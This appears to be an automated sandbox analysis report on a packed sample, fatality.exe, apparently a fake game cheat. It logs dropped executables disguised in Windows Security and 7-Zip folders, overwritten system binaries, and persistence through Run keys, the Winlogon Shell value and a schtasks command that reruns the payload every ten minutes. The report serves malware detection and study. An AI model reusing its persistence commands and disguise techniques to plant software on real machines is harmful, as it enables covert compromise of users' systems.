                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: mscoree.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: kernel.appcore.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: version.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: uxtheme.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: windows.storage.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: wldp.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: profapi.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptsp.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: rsaenh.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptbase.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: sspicli.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: mscoree.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: kernel.appcore.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: version.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: uxtheme.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: windows.storage.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: wldp.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: profapi.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptsp.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: rsaenh.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptbase.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: sspicli.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: apphelp.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: version.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: uxtheme.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: windows.storage.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: wldp.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: profapi.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: cryptsp.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: rsaenh.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: cryptbase.dll
                                    Source: C:\ProgramData\dbg\containerReview.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: version.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeSection loaded: sspicli.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: mscoree.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: version.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: uxtheme.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: windows.storage.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: wldp.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: profapi.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: cryptsp.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: rsaenh.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: cryptbase.dll
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeSection loaded: sspicli.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: mscoree.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: kernel.appcore.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: version.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: uxtheme.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: windows.storage.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: wldp.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: profapi.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptsp.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: rsaenh.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: cryptbase.dll
                                    Source: C:\blockcomSession\containerReview.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\fatality.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\d81cfa058c78b8Jump to behavior
                                    Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\7-Zip\Lang\d81cfa058c78b8Jump to behavior
                                    Source: fatality.exeStatic file information: File size 3319076 > 1048576
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: fatality.exe, fatality.exe, 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.pdb source: containerReview.exe, 00000005.00000002.2220599721.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.pdb source: containerReview.exe, 00000005.00000002.2220599721.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp

                                    Data Obfuscation

                                    barindex
                                    Detected unpacking (changes PE section rights)
                                    Source: C:\Users\user\Desktop\fatality.exeUnpacked PE file: 0.2.fatality.exe.de0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;.rsrc:EW;Unknown_Section7:EW;cheat:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:W;Unknown_Section4:R;Unknown_Section5:R;.rsrc:EW;Unknown_Section7:EW;cheat:EW;
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline"
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline"
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline"Jump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline"Jump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeFile created: C:\blockcomSession\__tmp_rar_sfx_access_check_5458578Jump to behavior
                                    Source: fatality.exeStatic PE information: section name:
                                    Source: fatality.exeStatic PE information: section name:
                                    Source: fatality.exeStatic PE information: section name:
                                    Source: fatality.exeStatic PE information: section name:
                                    Source: fatality.exeStatic PE information: section name:
                                    Source: fatality.exeStatic PE information: section name:
                                    Source: fatality.exeStatic PE information: section name:
                                    Source: fatality.exeStatic PE information: section name: cheat
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E181CD push esi; ret 0_2_00E181D6
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DFF640 push ecx; ret 0_2_00DFF653
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DFEB78 push eax; ret 0_2_00DFEB96
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E77104 push ecx; mov dword ptr [esp], edx0_2_00E77109
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E6B28C push 00E6B6D8h; ret 0_2_00E6B6D0
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E633EA push 00E63418h; ret 0_2_00E63410
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E743A0 push 00E74400h; ret 0_2_00E743F8
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E7732C push ecx; mov dword ptr [esp], edx0_2_00E77331
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E634F8 push 00E6352Ch; ret 0_2_00E63524
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E7748C push ecx; mov dword ptr [esp], edx0_2_00E77491
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E63494 push 00E634C0h; ret 0_2_00E634B8
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E77448 push ecx; mov dword ptr [esp], edx0_2_00E7744D
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E74456 push 00E745A4h; ret 0_2_00E7459C
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E75454 push 00E754A1h; ret 0_2_00E75499
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E6345C push 00E63488h; ret 0_2_00E63480
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E63424 push 00E63450h; ret 0_2_00E63448
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E615F0 push 00E61641h; ret 0_2_00E61639
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E7954C push ecx; mov dword ptr [esp], edx0_2_00E7954D
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E73536 push 00E735B5h; ret 0_2_00E735AD
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E6B6DA push 00E6B74Bh; ret 0_2_00E6B743
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E726A4 push 00E7274Ch; ret 0_2_00E72744
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E74684 push ecx; mov dword ptr [esp], ecx0_2_00E74687
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E7262C push 00E726A2h; ret 0_2_00E7269A
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E7274E push 00E7279Ch; ret 0_2_00E72794
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E748F4 push ecx; mov dword ptr [esp], ecx0_2_00E748F6
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E618AA push 00E618D8h; ret 0_2_00E618D0
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E6B85E push 00E6B88Ch; ret 0_2_00E6B884
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E73804 push 00E73830h; ret 0_2_00E73828
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E61968 push 00E61994h; ret 0_2_00E6198C
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E62A48 push ecx; mov dword ptr [esp], eax0_2_00E62A49
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E62CF2 push 00E62D20h; ret 0_2_00E62D18
                                    Source: fatality.exeStatic PE information: section name: entropy: 7.996600566459323
                                    Source: fatality.exeStatic PE information: section name: entropy: 7.979119292488003
                                    Source: fatality.exeStatic PE information: section name: entropy: 7.461008587981874
                                    Source: fatality.exeStatic PE information: section name: entropy: 7.941503255275258
                                    Source: fatality.exeStatic PE information: section name: entropy: 7.853249739854464
                                    Source: fatality.exeStatic PE information: section name: .rsrc entropy: 7.51495699813517
                                    Source: fatality.exeStatic PE information: section name: cheat entropy: 7.982180837051556
                                    Source: containerReview.exe.0.drStatic PE information: section name: .text entropy: 7.568689515066778
                                    Source: mQBLhXIPAJ.exe.5.drStatic PE information: section name: .text entropy: 7.568689515066778
                                    Source: mQBLhXIPAJ.exe0.5.drStatic PE information: section name: .text entropy: 7.568689515066778
                                    Source: containerReview.exe.5.drStatic PE information: section name: .text entropy: 7.568689515066778
                                    Source: mQBLhXIPAJ.exe1.5.drStatic PE information: section name: .text entropy: 7.568689515066778
                                    Source: mQBLhXIPAJ.exe2.5.drStatic PE information: section name: .text entropy: 7.568689515066778

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\blockcomSession\containerReview.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile created: C:\Users\user\Desktop\jPEOVQoM.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\ProgramData\dbg\containerReview.exeJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile created: C:\Users\user\Desktop\VquIdqjl.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\RLUzQxgL.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile created: C:\Users\user\Desktop\nCWNxMEA.logJump to dropped file
                                    Source: C:\Users\user\Desktop\fatality.exeFile created: C:\blockcomSession\containerReview.exeJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\PRRjZxCV.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\mQBLhXIPAJ.exeJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exeJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\GgZbKUMi.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\RUDRugHQ.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\blockcomSession\mQBLhXIPAJ.exeJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\LTranRbW.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile created: C:\Users\user\Desktop\HTJtRROP.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile created: C:\Users\user\Desktop\ucFnGTXv.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile created: C:\Users\user\Desktop\eTDxNkzS.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\yCQlabwB.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\ProgramData\dbg\containerReview.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\RLUzQxgL.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\PRRjZxCV.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\RUDRugHQ.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\GgZbKUMi.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\yCQlabwB.logJump to dropped file
                                    Source: C:\blockcomSession\containerReview.exeFile created: C:\Users\user\Desktop\LTranRbW.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile created: C:\Users\user\Desktop\ucFnGTXv.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile created: C:\Users\user\Desktop\jPEOVQoM.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile created: C:\Users\user\Desktop\HTJtRROP.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile created: C:\Users\user\Desktop\nCWNxMEA.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile created: C:\Users\user\Desktop\eTDxNkzS.logJump to dropped file
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeFile created: C:\Users\user\Desktop\VquIdqjl.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates an undocumented autostart registry key
                                    Source: C:\blockcomSession\containerReview.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Creates multiple autostart registry keys
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReviewJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 10 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /f
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJJump to behavior
